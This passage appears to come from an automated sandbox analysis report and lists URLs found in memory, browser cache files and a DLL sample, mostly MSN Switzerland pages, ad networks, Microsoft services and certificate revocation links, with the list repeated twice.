            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: iab2Data[1].json.6.drString found in binary or memory: https://channelpilot.co.uk/privacy-policy
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: iab2Data[1].json.6.drString found in binary or memory: https://docs.prebid.org/privacy.html
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: de-ch[1].htm.6.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.6.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: iab2Data[1].json.6.drString found in binary or memory: https://listonic.com/privacy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1605766094&amp;rver
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1605766094&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1605766095&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1605766094&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.6.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: iab2Data[1].json.6.drString found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
            Source: iab2Data[1].json.6.drString found in binary or memory: https://quantyoo.de/datenschutz
            Source: auction[1].htm.6.drString found in binary or memory: https://r1-usc1.zemanta.com/rp/u1gklbadixog/b1_msn/3927532/30291974/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27
            Source: auction[1].htm.6.drString found in binary or memory: https://r1-usc1.zemanta.com/rp/u1qgeh572kn4/b1_msn/3788882/29593540/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27
            Source: iab2Data[1].json.6.drString found in binary or memory: https://related.hu/adatkezeles/
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.6.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-verticals-shoppinghub
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b6vzA.img?h=27&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8JvL.img?h=166&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8RRR.img?h=166&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8T10.img?h=333&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.admo.tv/en/privacy-policy
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=mestripe
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=topnav
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&amp;utm_campaign=infopane-elec
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-karte
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-live
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.brightcom.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionieren
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.gadsme.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp:
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancoma
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninit
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mo
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeis
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-si
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/ar
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hpl
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-a
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/fussball/petkovic-wollen-auch-k%c3%bcnftig-gegen-grosse-mannschaften
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: auction[1].htm.6.drString found in binary or memory: https://www.outbrain.com/legal/privacy/de
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.remixd.com/privacy_policy.html
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
            Source: auction[1].htm.6.drString found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&amp;h=33
            Source: auction[1].htm.6.drString found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&amp;h=33
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: 0pz1on1.dllString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
            Source: 0pz1on1.dllString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
            Source: 0pz1on1.dllString found in binary or memory: http://www.bullguard.com0
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository/0
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository/03
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository09
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: iab2Data[1].json.6.drString found in binary or memory: https://bealion.com/politica-de-cookies
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: iab2Data[1].json.6.drString found in binary or memory: https://channelpilot.co.uk/privacy-policy
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: iab2Data[1].json.6.drString found in binary or memory: https://docs.prebid.org/privacy.html
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: de-ch[1].htm.6.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.6.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: iab2Data[1].json.6.drString found in binary or memory: https://listonic.com/privacy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1605766094&amp;rver
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1605766094&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1605766095&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1605766094&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.6.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: iab2Data[1].json.6.drString found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
            Source: iab2Data[1].json.6.drString found in binary or memory: https://quantyoo.de/datenschutz
            Source: auction[1].htm.6.drString found in binary or memory: https://r1-usc1.zemanta.com/rp/u1gklbadixog/b1_msn/3927532/30291974/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27
            Source: auction[1].htm.6.drString found in binary or memory: https://r1-usc1.zemanta.com/rp/u1qgeh572kn4/b1_msn/3788882/29593540/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27
            Source: iab2Data[1].json.6.drString found in binary or memory: https://related.hu/adatkezeles/
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.6.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-verticals-shoppinghub
            Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b6vzA.img?h=27&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8JvL.img?h=166&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8RRR.img?h=166&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8T10.img?h=333&amp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.admo.tv/en/privacy-policy
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=mestripe
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=topnav
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&amp;utm_campaign=infopane-elec
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-karte
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-live
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.brightcom.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionieren
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.gadsme.com/privacy-policy/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp:
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancoma
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
